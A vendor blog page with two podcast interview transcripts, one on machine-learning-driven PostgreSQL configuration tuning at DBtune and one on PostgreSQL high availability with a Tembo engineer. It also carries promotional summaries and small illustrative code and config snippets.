Machine Learning driven Database Optimization with Luigi Nardi from DBtune (interview)
Thu, 27 Jun 2024

The post Machine Learning driven Database Optimization with Luigi Nardi from DBtune (interview) appeared first on simplyblock.

Introduction

This interview is part of the simplyblock Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, and our show site.

In this insightful episode of the Cloud Commute podcast, we explore the cutting-edge field of machine learning-driven database optimization with Luigi Nardi.

Key Takeaways

Q: Can machine learning improve database performance? Yes, machine learning can significantly improve database performance. DBtune uses machine learning algorithms to automate the tuning of database parameters, such as CPU, RAM, and disk usage. This not only enhances the efficiency of query execution but also reduces the need for manual intervention, allowing database administrators to focus on more critical tasks. The result is a more responsive and cost-effective database system.

Q: How do machine learning models predict query performance in databases? DBtune employs probabilistic models to predict query performance. These models analyze various metrics, such as CPU usage, memory allocation, and disk activity, to forecast how queries will perform under different conditions. The system then provides recommendations to optimize these parameters, ensuring that the database operates at peak efficiency. This predictive capability is crucial for maintaining performance in dynamic environments.

Q: What are the main challenges in integrating AI-driven optimization with legacy database systems? Integrating AI-driven optimization into legacy systems presents several challenges. Compatibility issues are a primary concern, as older systems may not easily support modern optimization techniques. Additionally, there’s the need to gather sufficient data to train machine learning models effectively. Luigi also mentions the importance of addressing security concerns, especially when sensitive data is involved, and ensuring that the integration process does not disrupt existing workflows.

Q: Can you provide examples of successful AI-driven query optimization in real-world applications? DBtune has successfully applied its technology across various database systems, including Postgres, MySQL, and SAP HANA. For instance, in a project with a major telecom company, DBtune’s optimization algorithms reduced query execution times by up to 80%, leading to significant cost savings and improved system responsiveness. These real-world applications demonstrate the practical benefits of AI-driven query optimization in diverse environments.


In addition to highlighting the key takeaways, it’s essential to provide deeper context and insights that enrich the listener’s understanding of the episode. By offering this added layer of information, we ensure that when you tune in, you’ll have a clearer grasp of the nuances behind the discussion. This approach enhances your engagement with the content and helps shed light on the reasoning and perspective behind the thoughtful questions posed by our host, Chris Engelbert. Ultimately, this allows for a more immersive and insightful listening experience.

Key Learnings

Q: Can machine learning be used for optimization?

Yes, machine learning can be highly effective in optimizing complex systems by analyzing large datasets and identifying patterns that might not be apparent through traditional methods. It can automatically adjust system configurations, predict resource needs, and streamline operations to enhance performance.

simplyblock Insight: While simplyblock does not directly use machine learning for optimization, it provides advanced infrastructure solutions that are designed to seamlessly integrate with AI-driven tools. This allows organizations to leverage machine learning capabilities within a robust and flexible environment, ensuring that their optimization processes are supported by reliable and scalable infrastructure.

Q: How does AI-driven query optimization improve database performance?

AI-driven query optimization improves database performance by analyzing system metrics in real-time and adjusting configurations to enhance data processing speed and efficiency. This leads to faster query execution and better resource utilization.

simplyblock Insight: simplyblock’s platform enhances database performance through efficient storage management and high availability features. By ensuring that storage is optimized and consistently available, simplyblock allows databases to maintain high performance levels, even as AI-driven processes place increasing demands on the system.

Q: What are the main challenges in integrating AI-driven optimization with legacy database systems?

Integrating AI-driven optimization with legacy systems can be challenging due to compatibility issues, the complexity of existing configurations, and the risk of disrupting current operations.

simplyblock Insight: simplyblock addresses these challenges by offering flexible deployment options that are compatible with legacy systems. Whether through hyper-converged or disaggregated setups, simplyblock enables seamless integration with existing infrastructure, minimizing the risk of disruption and ensuring that AI-driven optimizations can be effectively implemented.

Q: What is the relationship between machine learning and databases?

The relationship between machine learning and databases is integral, as machine learning algorithms rely on large datasets stored in databases to train and improve, while databases benefit from machine learning’s ability to optimize their performance and efficiency.

simplyblock Insight: simplyblock enhances this relationship by providing a scalable and reliable infrastructure that supports large datasets and high-performance demands. This allows databases to efficiently manage the data required for machine learning, ensuring that the training and inference processes are both fast and reliable.

Additional Nugget of Information

Q: How is the rise of vector databases impacting the future of machine learning and databases? The rise of vector databases is revolutionizing how large language models and AI systems operate by enabling more efficient storage and retrieval of vector embeddings. These databases, such as pgvector for Postgres, are becoming essential as AI applications demand more from traditional databases. The trend indicates a future where databases are increasingly specialized to handle the unique demands of AI, which could lead to even greater integration between machine learning and database management systems. This development is likely to play a crucial role in the ongoing evolution of both AI and database technologies.
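The mechanics behind vector embeddings are straightforward to sketch: documents and queries become numeric vectors, and "closeness" is measured with a similarity metric such as cosine similarity, which is essentially what pgvector's cosine-distance operator computes at scale (with indexing). The pure-Python toy below uses invented 4-dimensional vectors purely for illustration; real embedding models produce hundreds or thousands of dimensions.

```python
import math

def cosine_similarity(a: list[float], b: list[float]) -> float:
    """Cosine similarity between two embedding vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

# Toy 4-dimensional "embeddings"; the values are invented for illustration.
documents = {
    "postgres tuning":  [0.9, 0.1, 0.0, 0.2],
    "cooking recipes":  [0.0, 0.8, 0.6, 0.1],
    "database indexes": [0.7, 0.3, 0.2, 0.1],
}

# A query embedding close to the "postgres tuning" document.
query = [0.85, 0.15, 0.05, 0.25]
ranked = sorted(documents,
                key=lambda d: cosine_similarity(query, documents[d]),
                reverse=True)
print(ranked[0])  # postgres tuning
```

A vector database performs the same ranking over millions of vectors using approximate-nearest-neighbor indexes instead of a full scan.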

Conclusion

Luigi Nardi showcases how machine learning is transforming database optimization. As DBtune’s founder, he highlights the power of AI to boost performance, cut costs, and enhance sustainability in database management. The discussion also touches on emerging trends like vector databases and DBaaS, making it a must-listen for anyone keen on the future of database technology. Stay tuned for more videos on cutting-edge technologies and their applications.

Full Episode Transcript

Chris Engelbert: Hello, everyone. Welcome back to this week’s episode of simplyblock’s Cloud Commute podcast. This week I have Luigi with me. Luigi, obviously, from Italy. I don’t think he has anything to do with Super Mario, but he can tell us about that himself. So welcome, Luigi. Sorry for the really bad joke.

Luigi Nardi: Glad to be here, Chris.

Chris Engelbert: So maybe you start with introducing yourself. Who are you? We already know where you’re from, but I’m not sure if you’re actually residing in Italy. So maybe just tell us a little bit about you.

Luigi Nardi: Sure. Yes, I’m originally Italian. I left the country to explore and study abroad a little while ago. So in 2006, I moved to France and studied there for a little while. I spent almost seven years in total in France eventually. I did my PhD program there in Paris and worked in a company as a software engineer as well. Then I moved to the UK for a few years, did a postdoc at Imperial College London in downtown London, and then moved to the US. So I lived in California, Palo Alto more precisely, for a few years. Then in 2019, I came back to Europe and established my residency in Sweden.

Chris Engelbert: Right. Okay. So you’re in Sweden right now.

Luigi Nardi: That’s correct.

Chris Engelbert: Oh, nice. Nice. How’s the weather? Is it still cold?

Luigi Nardi: It’s great. Everybody thinks that Sweden has very bad weather, but Sweden is a very, very long country. So if you reside in the south, actually, the weather is pretty decent. It doesn’t snow very much.

Chris Engelbert: That is very true. I actually love Stockholm, a very beautiful city. All right. One thing you haven’t mentioned, you’re actually the founder and CEO of DBtune. So you left out the best part guess. Maybe tell us a little bit about DBtune now.

Luigi Nardi: Sure. DBtune is a company that is about four years old now. It’s a spinoff from Stanford University and the commercialization of about a decade of research and development in academia. We were working on the intersection between machine learning and computer systems, specifically the use of machine learning to optimize computer systems. This is an area that in around 2018 or 2019 received a new name, which is MLSys, machine learning and systems. This new area is quite prominent these days, and you can do very beautiful things with the combination of these two pieces. DBtune is specifically focusing on using machine learning to optimize computer systems, particularly in the computer system area. We are optimizing databases, the database management systems more specifically. The idea is that you can automate the process of tuning databases. We are focusing on the optimization of the parameters of the database management systems, the parameters that govern the runtime system. This means the way the disk, the RAM, and the CPU interact with each other. You take the von Neumann model and try to make it as efficient as possible through optimizing the parameters that govern that interaction. By doing that, you automate the process, which means that database engineers and database administrators can focus on other tasks that are equally important or even more important. At the same time, you get great performance, you can reduce your cloud costs as well. If you’re running in the cloud in an efficient way, you can optimize the cloud costs. Additionally, you get a check on your greenops, meaning the sustainability aspect of it. So this is one of the examples I really like of how you can be an engineer and provide quite a big contribution in terms of sustainability as well because you can connect these two things by making your software run more efficiently and then scaling down your operations.

Chris Engelbert: That is true. And it’s, yeah, I’ve never thought about that, but sure. I mean, if I get my queries to run more efficient and use less compute time and compute power, huh, that is actually a good thing. Now I’m feeling much better.

Luigi Nardi: I’m feeling much better too. Since we started talking a little bit more about this, we have a blog post that will be released pretty soon about this very specific topic. I think this connection between making software run efficiently and the downstream effects of that efficiency, both on your cost, infrastructure cost, but also on the efficiency of your operations. It’s often underestimated, I would say.

Chris Engelbert: Yeah, that’s fair. It would be nice if you, when it’s published, just send me over the link and I’m putting it into the show notes because I think that will be really interesting to a lot of people. As he said specifically for developers that would otherwise have a hard time having anything in terms of sustainability. You mentioned database systems, but I think DBtune specifically is focused on Postgres, isn’t it?

Luigi Nardi: Right. Today we are focusing on Postgres. As a proof of concept, though, we have applied similar technology to five different database management systems, including relational and non-relational systems as well. So we were, a little while ago, we wanted to show that this technology can be used across the board. And so we play around with MySQL, with FoundationDB, which is the system behind iCloud, for example, and many of the VMware products. And then we have RocksDB, which is behind your Instagram and Facebook and so on. Facebook, very pressing that open source storage system. And things like SAP HANA as well, we’ve been focusing on that a little bit as well, just as a proof of concept to show that basically the same methodology can apply to very different database management systems in general.

Chris Engelbert: Right. You want to look into Oracle and take a chunk of their money, I guess. But you’re on the right track with SAP HANA. It’s kind of on the same level. So how does that work? I think you have to have some kind of an agent inside of your database. For Postgres, you’re probably using the stats tables, but I guess you’re doing more, right?

Luigi Nardi: Right. This is the idea of, you know, observability and monitoring companies. They mainly focus on gathering all this metrics from the machine and then getting you a very nice visualization on your dashboard. As a user, you would look at these metrics and how they evolve over time, and then they help you guide the next step, which is some sort of manual optimization of your system. We are moving one step forward and we’re trying to use those metrics automatically instead of just giving them back to the user. So we move from a passive monitoring approach to an active approach where the metrics are collected and then the algorithm will help you also to automatically change the configuration of the system in a way that it gets faster over time. And so the metrics that we look at usually are, well, the algorithm itself will gather a number of metrics to help it to improve over time. And this type of metrics are related to, you know, your system usage, you know, CPU memory and disk usage. And other things, for example, latency and throughput as well from your Postgres database management system. So using things like pg_stat_statements, for example, for people that are a little more familiar with Postgres. And by design, we refrain from looking inside your tables or looking specifically at your metadata, at your queries, for example, we refrain from that because it’s easier to basically, you know, deploy our system in a way that it’s not dangerous for your data and for your privacy concerns and things like that.

Chris Engelbert: Right. Okay. And then you send that to a cloud instance that visualizes the data, just the simple stuff, but there’s also machine learning that actually looks at all the collected data and I guess try to find pattern. And how does that work? I mean, you probably have a version of the query parser, the Postgres query parser in the backend to actually make sense of this information, see what the execution plan would be. That is just me guessing. I don’t want to spoil your product.

Luigi Nardi: No, that’s okay. So the agent is open source and it gets installed on your environment. And anyone fluent in Python can read that in probably 20 minutes. So it’s pretty, it’s not massive. It’s not very big. That’s what gets connected with our backend system, which is running in our cloud. And the two things connect and communicate back and forth. The agent reports the metrics and requests what’s the next recommendation from the optimizer that runs in our backend. The optimizer responds with a recommendation, which is then enabled in the system through the agent. And then the agent also starts to measure what’s going on on the machine before reporting these metrics back to the backend. And so this is a feedback loop and the optimizer gets better and better at predicting what’s going on on the other side. So this is based on machine learning technology and specifically probabilistic models, which I think is the interesting part here. By using probabilistic models, the system is able to predict the performance for a new guess, but also predict the uncertainty around that estimate. And that’s, I think, very powerful to be able to combine some sort of prediction, but also how confident you are with respect to that prediction. And those things are important because when you’re optimizing a computer system, of course, you’re running this in production and you want to make sure that this stays safe for the system that is running. You’re changing the system in real time. So you want to make sure that these things are done in a safe way. And these models are built in a way that they can take into account all these unpredictable things that may otherwise book in the engineer system.

Chris Engelbert: Right. And you mentioned earlier that you’re looking at the pg_stat_statements table, can’t come up with the name right now. But that means you’re not looking at the actual data. So the data is secure and it’s not going to be sent to your backend, which I think could be a valid fear from a lot of people like, okay, what is actually being sent, right?

Luigi Nardi: Exactly. So Chris, when we talk with large telcos and big banks, the first thing that they say, what are you doing to my data? So you need to sit down and meet their infosec teams and explain to them that we’re not transferring any of that data. And it’s literally just telemetrics. And those telemetrics usually are not sensitive in terms of privacy and so on. And so usually there is a meeting that happens with their infosec teams, especially for big banks and telcos, where you clarify what is being sent and then they look at the source code because the agent is open source. So you can look at the open source and just realize that nothing sensitive is being sent to the internet.

Chris Engelbert: Right.

Luigi Nardi: And perhaps to add one more element there. So for the most conservative of our clients, we also provide a way to deploy this technology in a completely offline manner. So when everybody’s of course excited about digital transformations and moving to the cloud and so on, we actually went kind of backwards and provided a way of deploying this, which is sending a standalone software that runs in your environment and doesn’t communicate at all to the internet. So we have that as an option as well for our users. And that supports a little harder for us to deploy because we don’t have direct access to that anymore. So it’s easy for us to deploy the cloud-based version. But if you, you know, in some cases, you know, there is not very much you can do that will not allow you to go through the internet. There are companies that don’t buy Salesforce for that reason. So if you don’t buy Salesforce, you probably not buy from anybody else on the planet. So for those scenarios, that’s what we do.

Chris Engelbert: Right. So how does it work afterwards? So the machine learning looks into the data, tries to find patterns, has some optimization or some … Is it only queries or does it also give me like recommendations on how to optimize the Postgres configuration itself? And how does that present those? I guess they’re going to be shown in the UI.

Luigi Nardi: So we’re specifically focusing on that aspect, the optimization of the configuration of Postgres. So that’s our focus. And so the things like, if you’re familiar with Postgres, things like the shared buffers, which is this buffer, which contains the copy of the data from tables from the disk and keep it a local copy on RAM. And that data is useful to keep it warm in RAM, because when you interact with the CPU, then you don’t need to go all the way back to disk. And so if you go all the way back to disk, there is an order of magnitude more like delay and latency and slow down based on that. So you try to keep the data close to where it’s processed. So trying to keep the data in cache as much as possible and share buffer is a form of cache where the cache used in this case is a piece of RAM. And so sizing these shared buffers, for example, is important for performance. And then there are a number of other things similar to that, but slightly different. For example, in Postgres, there is an allocation of a buffer for each query. So each query has a buffer which can be used as an operating memory for the query to be processed. So if you’re doing some sort of like sorting, for example, in the query that small memory is used again. And you want to keep that memory close to the CPU and specifically the workman parameter, for example, is what helps with that specific thing. And so we optimize all this, all these things in a way that the flow of data from disk to the registers of the CPU, it’s very, very smooth and it’s optimized. So we optimize the locality of the data, both spatial and temporal locality if you want to use the technical terms for that.

Chris Engelbert: Right. Okay. So it doesn’t help me specifically with my stupid queries. I still have to find a consultant to fix that or find somebody else in the team.

Luigi Nardi: Yeah, for now, that’s correct. We will probably focus on that in the future. But for now, the way you usually optimize your queries is that you optimize your queries and then if you want to see what’s the actual benefit, you should also optimize your parameters. And so if you want to do it really well, you should optimize your queries, then you go optimize your parameters and go back optimize again your queries, parameters and kind of converge into this process. So now that one of the two is fully automated, you can focus on the queries and, you know, speed up the process of optimizing the queries by a large margin. So to in terms of like benefits, of course, if you optimize your queries, you will write your queries, you can get, you know, two or three order of magnitude performance improvement, which is really, really great. If you optimize the configuration of your system, you can get, you know, an order of magnitude in terms of performance improvement. And that’s, that’s still very, very significant. Despite what many people say, it’s possible to get an order of magnitude improvement in performance. If your system by baseline, it’s fairly, it’s fairly basic, let’s say. And the interesting fact is that by the nature of Postgres, for example, the default configuration of Postgres needs to be pretty conservative because Postgres needs to be able to run on big server machines, but also on smaller machines. So the form factor needs to be taken into account when you define the default configuration of Postgres. And so by that fact, it needs to be pretty conservative. And so what you can observe out there is that this problem is so complex that people don’t really change the default configuration of Postgres when they run on a much bigger instance. And so there is a lot of performance improvement that can be obtained by changing that configuration to a better-suited configuration. 
And the point of doing this through automation and through things like DBtune is that you can then refine the configuration of your system specifically for the use case that you have: your application, your workload, the machine size. All these things are considered together to give you the best outcome for your use case, which is, I think, the novelty of this approach, right? Because if you’re doing this through some sort of heuristics, they usually don’t really cover all these different things, and they will always fall short with respect to what you can do with an observability loop, right?

Chris Engelbert: Yeah, and I think you mentioned that a lot of people don’t touch the configuration. I think there is the problem that the Postgres configuration is very complex. A lot of parameters depend on each other. And it’s, I mean, I’m coming from a Java background, and we have the same thing with garbage collectors. Optimizing a garbage collector, for every single algorithm you have like 20 or 30 parameters, all of them depend on each other. Changing one may completely disrupt all the other ones. And I think that is what a lot of people kind of fear away from. And then you Google, and then there’s like the big Postgres community telling you, “No, you really don’t want to change that parameter until you really know what you’re doing,” and you don’t know, so you leave it alone. So in this case, I think something like Dbtune will be or is absolutely amazing.

Luigi Nardi: Exactly. And, you know, if you spend some time on blog posts learning about the Postgres parameters you get that type of feedback and takes a lot of time to learn it in a way that you can feel confident and comfortable in changes in your production system, especially if you’re working in a big corporation. And the idea here is that at DBtune we are partnered with leading Postgres experts as well. Magnus Hagander, for example, we see present of the Postgres Europe organization, for example, it’s been doing this manual tuning for about two decades and we worked very closely with him to be able to really do this in a very safe manner, right. You should basically trust our system to be doing the right thing because it’s engineering a way that incorporates a lot of domain expertise so it’s not just machine learning it’s also about the specific Postgres domain expertise that you need to do this well and safely.

Chris Engelbert: Oh, cool. All right. We’re almost out of time. Last question. What do you think it’s like the next big thing in Postgres and databases, in cloud, in db tuning.

Luigi Nardi: That’s a huge question. So we’ve seen all sorts of things happening recently with, of course, AI stuff but, you know, I think it’s, it’s too simple to talk about that once more I think you guys covered those type of topics a lot. I think what’s interesting is that there is there is a lot that has been done to support those type of models and using for example the rise of vector databases for example, which was I think quite interesting vector databases like for example the extension for Postgres, the pgvector was around for a little while but in last year you really saw a huge adoption and that’s driven by all sort of large language models that use this vector embeddings and that’s I think a trend that will see for a little while. For example, our lead investor 42CAP, they recently invested in another company that does this type of things as well, Qdrant for example, and there are a number of companies that focus on that Milvus and Chroma, Zilliz, you know, there are a number of companies, pg_vectorize as well by the Tembo friends. So this is certainly a trend that will stay and for a fairly long time. In terms of database systems, I am personally very excited about the huge shift left that is happening in the industry. Shift left the meaning all the databases of service, you know, from Azure flexible server Amazon RDS, Google Cloud SQL, those are the big ones, but there are a number of other companies that are doing the same and they’re very interesting ideas, things that are really, you know, shaping that whole area, so I can mention a few for example, Tembo, even EnterpriseDB and so on that there’s so much going on in that space and in some sort, the DBtune is really in that specific direction, right? So helping to automate more and more of what you need to do in a database when you’re operating at database. From a machine learning perspective, and then I will stop that Chris, I think we’re running out of time. 
From a machine learning perspective, I’m really interested in, and that’s something that we’ve been studying for a few years now in my academic team with my PhD students, pushing the boundaries of what we can do in terms of using machine learning for computer systems, specifically when you get computer systems that have hundreds, if not thousands, of parameters and variables to be optimized jointly at the same time. We have recently published a few pieces of work that you can find on my Google Scholar on that specific topic. It’s a little math-y, you know, a little hard to read in parts, but it’s quite rewarding to see these new pieces of technology becoming available to practitioners and people who work on applications as well. So perhaps the attention will move away at some point from LLMs alone to other areas in machine learning and AI that are equally interesting, in my opinion.

Chris Engelbert: Perfect. That’s, that’s beautiful. Just send me the link. I’m happy to put it into the show note. I bet there’s quite a few people that would be really, really into reading those things. I’m not big on mathematics that’s probably way over my head, but that’s, that’s fine. Yeah, I was that was a pleasure. Thank you for being here. And I hope we. Yeah, I hope we see each other somewhere at a Postgres conference we just briefly talked about that before the recording started. So yeah, thank you for being here. And for the audience, I see you, I hear you next week or you hear me next week with the next episode. And thank you for being here as well.

Luigi Nardi: Awesome. For the audience: we will be at the Postgres Switzerland conference as sponsors, and we will be giving talks there. So if you come by, feel free to say hi, and we can grab coffee together. Thank you very much.

Chris Engelbert: Perfect. Yes. Thank you. Bye bye.


How I designed PostgreSQL High Availability with Shaun Thomas from Tembo (video + interview)
Thu, 20 Jun 2024


This interview is part of simplyblock’s Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

In this installment, we’re talking to Shaun Thomas (Twitter/X, personal blog), affectionately known as “Mr. High Availability” in the Postgres community, to discuss his journey from a standard DBA to a leading expert in high availability solutions for Postgres databases. Shaun shares his experiences working in financial services, where he redefined high availability using tools like Pacemaker and DRBD, and the path that led him to authoring a comprehensive book on the subject. Shaun also talks about his current work at Tembo, an organization dedicated to advancing open-source Postgres, and their innovative approaches to high availability, including the use of Kubernetes and containerized deployments.

EP17 - How I designed PostgreSQL High Availability with Shaun Thomas from Tembo

Chris Engelbert: Hello, welcome back to this week’s episode of simplyblock’s Cloud Commute podcast. This week I have – no, I’m not saying that. I’m not saying I have another incredible guest, even though I have. He’s already shaking his head. Nah, I’m not incredible. He’s just known as Mr. High Availability in the Postgres space for a very specific reason. I bet he’ll talk about that in a second.

So hello, Shaun. Shaun Thomas, thank you for being here. And maybe just introduce yourself real quick. Who are you? Well, where are you from? How did you become Mr. High Availability?

Shaun Thomas: Yeah, so glad to be here. Kind of hang out with you. We talked a little bit. It’s kind of fun. My background is I was just a standard DBA, kind of working on programming stuff at a company I was at and our DBA quit, so I kind of had to pick it up to make sure we kept going. And that was back in the Oracle days. So I just kind of read a bunch of Oracle books to kind of get ready for it. And then they had some layoffs, so our whole division got cut. And then my next job was as a DBA. And I just kind of latched onto it from there.

And as far as how I got into high availability and where I kind of made that my calling card was around 2010, I started working for a company that was in financial services. And they had to keep their systems online at all times because every second they were down, they were losing millions of dollars.

So they actually already had a high availability stack, but it was using a bunch of proprietary tools. So when I started working there, I basically reworked everything. We ended up using the standard stack at the time, which was Pacemaker with Corosync and DRBD, the distributed replicated block device, because we didn’t really trust replication back then; it was still too new.

We were also running Enterprise DB at the time, so there were a bunch of beta features they had kind of pushed into 9.2 at the time, I think. Because of that whole process and not really having any kind of guide to follow, since there were not a lot of high availability tools back in 2010, 2011, I basically wrote up our stack and the process I used. I presented it at the second Postgres Open that was in Chicago. I did a live demo of the entire stack, and that video is probably online somewhere. My slides, I think, are also on the Postgres Wiki. But after that, I was approached by Packt, the publisher. They wanted me to write a book on it. So I did. I did it mainly because I didn’t have a book to follow. Somebody else in this position really needs to have some kind of series or a book or some kind of step-by-step thing because high availability in Postgres is really important. You don’t want your database to go down in a lot of situations. Until there’s a lot more tools out there to cover your bases, being able to do it is important. Now there’s tons of tools for it, so it’s not a big problem. But back then, man, oof.

Chris Engelbert: Yeah, yeah. I mean, you just mentioned Pacemaker. I’m not sure when I heard that thing the last time. Is that even still a thing?

Shaun Thomas: There’s still a couple of companies using it. Yeah, you would be surprised. I think DFW does in a couple of spots.

Chris Engelbert: All right. I haven’t heard about that in at least a decade, I think. Everything I’ve worked with had different– or let’s say other tools, not different tools. Wow. Yeah, cool. So you wrote that book. And you said you came from an Oracle world, right? So how did the transition to Postgres happen? Was that a choice?

Shaun Thomas: For me, it wasn’t really much of a transition because, like I said, our DBA quit at the company I was at. And it was right before a bunch of layoffs that took out that entire division. But at the time, I was like, ooh, Oracle. I should learn all this stuff. So the company just had a bunch of old training materials lying around. And there were like three or four of the huge Oracle books lying around. So I spent the next three or four weeks just reading all of them back to back.

I was testing in a cluster that we had available, and I set the local version up on my computer just to see if it worked and to learn all the stuff I was trying to understand at the time. But then the layoffs hit, so I was like, what do I do now?

I got another job at a company that needed a DBA. And that was MySQL and Postgres. But that was back when Postgres was still 6.5. Back when it crashed if you looked at it funny. So I got kind of mad at it. And I basically stopped using it from like 2005 to 2010. Or no, that was, sorry, from 2001 to 2005. From 2005, I switched to a company that they were all Postgres. So I got the purple Postgres book. The one that everyone used back then was I think it was 8.1 or 8.2. And then I revised their entire stack also because they were having problems with vacuum. Because back then, the settings were all wrong. So you would end up loading yourself out of your disk space. I ended up vacuuming their systems down from I think it was 20 gigs down to like 5. And back then, that was a lot of disk space.

Chris Engelbert: I was just about to say that in 2005, 20 gigabytes of disk space was a lot.

Shaun Thomas: But back then, the problem with vacuum was you actually had to set the size of the free space map. And the default was way too small. So what would happen is vacuum would only keep track of the first 200,000 dead, reusable rows by default.

So if you had more than that, even if you were vacuuming constantly, it would still bloat like a little bit every day until your whole disk was used. So I actually had to clean all that up or their system was going to crash. They were days away from going down when I joined. They had already added all the disks they could. And back then, you couldn’t just add virtual disk space.
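For historical context, the knob Shaun is describing lived in postgresql.conf: the free space map was a fixed-size, shared-memory structure until PostgreSQL 8.4 removed it. A sketch of the relevant settings (values here are illustrative, not the exact defaults of any one release):

```ini
# postgresql.conf, PostgreSQL 8.3 and earlier (illustrative values)
# The free space map could only remember a fixed number of pages with
# reusable space. Anything beyond this limit was forgotten, so even a
# constantly vacuumed table would still bloat a little every day.
max_fsm_pages = 200000      # total pages with free space to track
max_fsm_relations = 1000    # number of tables and indexes to track
```

Modern PostgreSQL keeps the free space map on disk per relation, so these settings no longer exist.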

Chris Engelbert: I know those situations, not in the Postgres or database space, but in the software development space where– same thing, I literally joined days before it all would fall apart. Let’s say those are not the best days to join.

Shaun Thomas: Hey, that’s why they hired you, right?

Chris Engelbert: Exactly. All right. So let’s talk a little bit about these days. Right now, you’re with Tembo. And you just have this very nice blog post that blew up on Hacker News for all the wrong reasons.

Shaun Thomas: Well, I mean, we created it for all the right reasons. And so let me just start on Tembo a little bit. So Tembo is like they are all in on Postgres. We are ridiculously all in. Basically, everything we do is all open sourced. You can go to Tembo.io on GitHub. And basically, our entire stack is there. And we even just released our on-prem. So you can actually use our stack on your local system and basically have a Kubernetes cloud management thing for all the clusters you want to manage. And it’ll just be our stack of tools. And the main calling card of Tembo is probably our– if you go to trunk, I think it’s called PGT.dev . We just keep track of a bunch of extensions. And it’s got a command line tool to install them, kind of like a PGXN. And we’re so kind of into this that we actually hired the guy who basically maintained PGXN, David Wheeler. Because we were like, we need to kind of hit the extension drum. And we’re very glad he’s re-standardizing PGXN 2. He’s starting a whole initiative. And he’s got a lot of buy-in from tons of different committers and devs and people who are really pushing it. Maybe we’ll create the gold standard of extension networks. Because the idea is to get it all so that it’s packaged, right? Kind of like a Debian or an RPM or whatever package system you want to use. It’ll just install the package on your Postgres wherever it is. Like the source install, if it’s like a package install, or if it’s something with on your Mac, whatever.

So he’s working on that really. And he’s done some demos that are very impressive. And it looks like it’ll actually be a great advancement. But Tembo is – it’s all about open source Postgres. And our tools kind of show that. Like if you’ve ever heard of Adam Hendel, he goes by Chuck. But if you heard of PGMQ or PG Vectorize, which kind of makes PG Vector a little easier to use, those tools are all coming from us, basically. So we’re putting our money where our mouth is, right?

All right. That’s why I joined them. Because I kept seeing them pop up on Twitter. And I’m like, man, these guys really– they’re really dedicated to this whole thing.

Chris Engelbert: Yeah, cool. So back to PG and high availability. Why would I need that? I mean, I know. But maybe just give the audience a little bit of a clue.

Shaun Thomas: So high availability– and I kind of implied this when I was talking about the financial company, right? The whole idea is to make sure Postgres never goes down. But there’s so much more to it. I’ve done conferences. And I’ve done webinars. And I’ve done trainings. And I’ve done the book. Just covering that topic is it’s essentially an infinite font of just all the different ways you can do it, all the different prerequisites you need to fulfill, all the different things you need to set up to make it work properly. But the whole point is keep your Postgres up. But you also have to define what that means. Where do you put your Postgres instances? Where do you put your replicas? How do you get to them? Do you need an intermediate abstraction layer so that you can connect to that? And it’ll kind of decide where to send you afterwards so you don’t have any outages as far as routing is concerned?

It’s a very deep topic. And it’s easy to get wrong. And a lot of the tools out there, they don’t necessarily get it wrong. But they expect the user to get it right. One of the reasons my book did so well in certain circles is because if you want to set up EFM or repmgr or Patroni or some other tool, you have to follow very closely and know how the tool works extremely well. You have to be very familiar with the documentation. You can’t just follow step by step and then expect it to work in a lot of cases.

Now, there’s a lot of edge cases you have to account for. You have to know why and the theories behind the high availability and how it works a certain way to really deploy it properly.

So even as a consultant when I was working at EDB and a second quadrant, it’s easy to give a stack to a customer and they can implement it with your recommendations. And you can even set it up for them. There’s always some kind of edge case that you didn’t think of.

So the issue with Postgres, in kind of my opinion, is it gives you a lot of tools to build it yourself, but it expects you to build it yourself. And even the other stack tools, like I had mentioned earlier, like repmgr or EFM or Patroni, or pg_auto_failover, another one that came out recently. They work, but you’ve got to install them. And you really do need access to an expert that can come in if something goes wrong. Because if something goes wrong, you’re kind of on your own in a lot of ways.

Postgres doesn’t really have an inherent integral way of managing itself as a cluster. It’s more of like a database that just happens to be able to talk to other nodes to keep them up to date with sync and whatnot. So it’s important, but it’s also hard to do right.

Chris Engelbert: I think you mentioned one important thing: it is important to define your goals upfront. How much uptime do you really need? Because one thing, not only with Postgres but in general, whenever we talk about fault-tolerant systems, high availability, all those kinds of things, that a lot of people seem to forget is that high availability or fault tolerance is a trade-off between how much time and money I invest and how much money I lose if something really, well, you could say, s***t hits the fan, right?

Shaun Thomas: Exactly. And that’s the thing. Companies like the financial company I worked at, they took high availability to a fault. They had two systems in their main data center and two more in their disaster recovery data center, all fully synced and up to date. They maintained daily backups on local systems, with copies sent to another system locally holding seven days’ worth. Additionally, backups were sent to tape, which was then sent to Glacier for seven years as per SEC rules.

So, someone could come into our systems and maliciously erase everything, and we’d be back up in an hour. It was very resilient, a result of our design and the amount of money we dedicated toward it, because that was a very expensive deployment. That’s at least 10 servers right there.

Chris Engelbert: But then, when you say you could be back up in an hour, the question is, how much money do you lose in that hour?

Shaun Thomas: Well, like I said, that scenario is like someone walking in and literally smashing all the servers. We’d have to rebuild everything from scratch. In most cases, we’d be up – and this is where your RTO and RPO come in, the recovery time objective and your recovery point objective. Basically, how much do you want to spend to say I want to be down for one minute or less? Or if I am down for that one minute, how much data will I lose? Because the amount of money you spend or the amount of resources you dedicate toward that thing will determine the end result of how much data you might lose or how much money you’ll need to spend to ensure you’re down for less than a minute.
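To make that trade-off concrete, here is a toy back-of-the-envelope sketch (all dollar figures and the cost model itself are invented for illustration): the expected cost of one outage is downtime multiplied by revenue lost per minute (the RTO side), plus the value of data lost inside the recovery point window (the RPO side).

```python
def outage_cost(rto_minutes, rpo_minutes, revenue_per_minute, data_value_per_minute):
    """Rough expected cost of a single outage.

    RTO: how long we are down. RPO: how many minutes of recent data we may lose.
    """
    downtime_cost = rto_minutes * revenue_per_minute
    data_loss_cost = rpo_minutes * data_value_per_minute
    return downtime_cost + data_loss_cost

# Hypothetical numbers: losing $10k per minute while down, recent data worth $2k per minute.
cheap_stack = outage_cost(rto_minutes=60, rpo_minutes=15,
                          revenue_per_minute=10_000, data_value_per_minute=2_000)
ha_stack = outage_cost(rto_minutes=1, rpo_minutes=0,
                       revenue_per_minute=10_000, data_value_per_minute=2_000)
print(cheap_stack)  # 630000
print(ha_stack)     # 10000
```

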